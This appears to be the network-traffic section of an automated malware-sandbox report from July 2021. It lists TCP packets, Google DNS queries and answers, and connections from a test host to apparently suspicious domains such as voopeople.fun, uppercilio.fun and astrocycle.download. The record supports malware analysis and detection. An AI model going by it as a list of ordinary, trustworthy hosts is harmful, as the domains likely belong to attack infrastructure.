                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.613886118 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.613935947 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.615149021 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.615348101 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.615394115 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.615684986 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.616187096 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.616208076 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.616862059 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.616956949 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.616977930 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.617069960 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.617949009 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.617971897 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.618083000 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.620003939 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.620034933 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.620152950 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.620357037 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.620378971 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.620573044 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.621413946 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.621438980 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.621503115 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.622684956 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.622709990 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.623425961 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.623558998 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.623584986 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.623912096 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.624480963 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.701199055 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.701231003 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.701503992 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.701575994 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.701596975 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.701965094 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.703212023 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.703243017 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.703358889 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.705741882 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.705849886 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.705877066 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.705899000 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.705920935 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.705945015 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.705981016 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.705996990 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.707318068 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.707469940 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.791671038 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.791707993 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.792007923 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.792176962 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.792196035 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.792284012 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.792576075 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.792598009 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.792759895 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.793567896 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.793587923 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.793754101 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.794348955 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.794369936 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.795367956 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.795430899 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.795450926 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.797408104 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.797435045 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.797470093 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.797497988 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.797521114 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.797576904 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.797873020 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.799524069 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.799551964 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.801554918 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.801614046 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.801661968 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.801815987 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.801843882 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.802165031 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.804477930 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.804529905 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.804567099 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.804596901 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.804631948 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.805548906 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.880538940 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.880590916 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.880767107 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.881045103 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.881078959 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.881165028 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.882855892 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.882894039 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.883179903 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.883205891 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.883250952 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.883317947 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.884360075 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.884407997 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.884960890 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.885457039 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.885483027 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.885639906 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.887229919 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.887283087 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.887573957 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.888971090 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889010906 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889229059 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889451027 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889484882 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889585972 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889595985 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889612913 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889689922 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.890558004 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.890582085 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.890659094 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.891679049 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.891706944 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.891753912 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.892786980 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.892808914 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.892875910 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.893806934 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.915877104 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.971398115 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.971422911 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.971632004 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.972678900 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.972722054 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.972750902 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.972779036 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.973638058 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.973867893 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.973891973 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.974328041 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.975905895 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.975935936 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.975956917 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.975977898 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.976100922 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.977652073 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.977739096 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.977955103 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.978118896 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.978167057 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.978205919 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.979255915 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.979363918 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.979408979 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.980470896 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.980535030 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.980843067 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.981363058 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.981399059 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.981446981 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.982409000 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.982467890 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.982527971 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.983371019 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.983397961 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.983504057 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.984519005 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060570002 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060607910 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060731888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060754061 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060811043 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060910940 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.061656952 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.061675072 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.061877966 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.063251972 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.063280106 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.063519001 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064069033 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064094067 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064193010 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064915895 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064939976 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064979076 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.066032887 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.066068888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.066119909 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.067262888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.067289114 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.067339897 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.068294048 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.068317890 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.068384886 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.069570065 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.069591045 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.069667101 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.070322990 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.070346117 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.070436001 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.073602915 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.261204958 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.284188986 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.299359083 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.300048113 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.300074100 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.338785887 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.828568935 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.828596115 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.828780890 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                                Jul 6, 2021 17:02:28.563040018 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:28.563436985 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                                Jul 6, 2021 17:04:21.874082088 CEST4916980192.168.2.22172.67.146.88
                                                                                                                                                                                                                                Jul 6, 2021 17:04:21.874717951 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                Jul 6, 2021 17:04:21.875232935 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                                                Jul 6, 2021 17:04:21.916270971 CEST8049169172.67.146.88192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:04:21.916296959 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:04:21.916306973 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:04:21.916524887 CEST4916980192.168.2.22172.67.146.88
                                                                                                                                                                                                                                Jul 6, 2021 17:04:21.916677952 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                                                Jul 6, 2021 17:04:21.916688919 CEST4916880192.168.2.22172.67.194.117

                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Jul 6, 2021 17:02:21.916457891 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                                                Jul 6, 2021 17:02:21.975888968 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.099387884 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.160144091 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.341444969 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.403510094 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.442266941 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.517529011 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.554577112 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.611675978 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.091429949 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.159929037 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.172430038 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.260128975 CEST53560098.8.8.8192.168.2.22

                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                Jul 6, 2021 17:02:21.916457891 CEST192.168.2.228.8.8.80xa4ceStandard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.099387884 CEST192.168.2.228.8.8.80xd36bStandard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.341444969 CEST192.168.2.228.8.8.80x6029Standard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.442266941 CEST192.168.2.228.8.8.80xb2ddStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.554577112 CEST192.168.2.228.8.8.80xaa88Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.091429949 CEST192.168.2.228.8.8.80x6848Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.172430038 CEST192.168.2.228.8.8.80x26aeStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                Jul 6, 2021 17:02:21.975888968 CEST8.8.8.8192.168.2.220xa4ceNo error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:21.975888968 CEST8.8.8.8192.168.2.220xa4ceNo error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.160144091 CEST8.8.8.8192.168.2.220xd36bNo error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.160144091 CEST8.8.8.8192.168.2.220xd36bNo error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.403510094 CEST8.8.8.8192.168.2.220x6029No error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.403510094 CEST8.8.8.8192.168.2.220x6029No error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.517529011 CEST8.8.8.8192.168.2.220xb2ddNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.517529011 CEST8.8.8.8192.168.2.220xb2ddNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.517529011 CEST8.8.8.8192.168.2.220xb2ddNo error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.611675978 CEST8.8.8.8192.168.2.220xaa88No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.611675978 CEST8.8.8.8192.168.2.220xaa88No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.611675978 CEST8.8.8.8192.168.2.220xaa88No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.159929037 CEST8.8.8.8192.168.2.220x6848No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
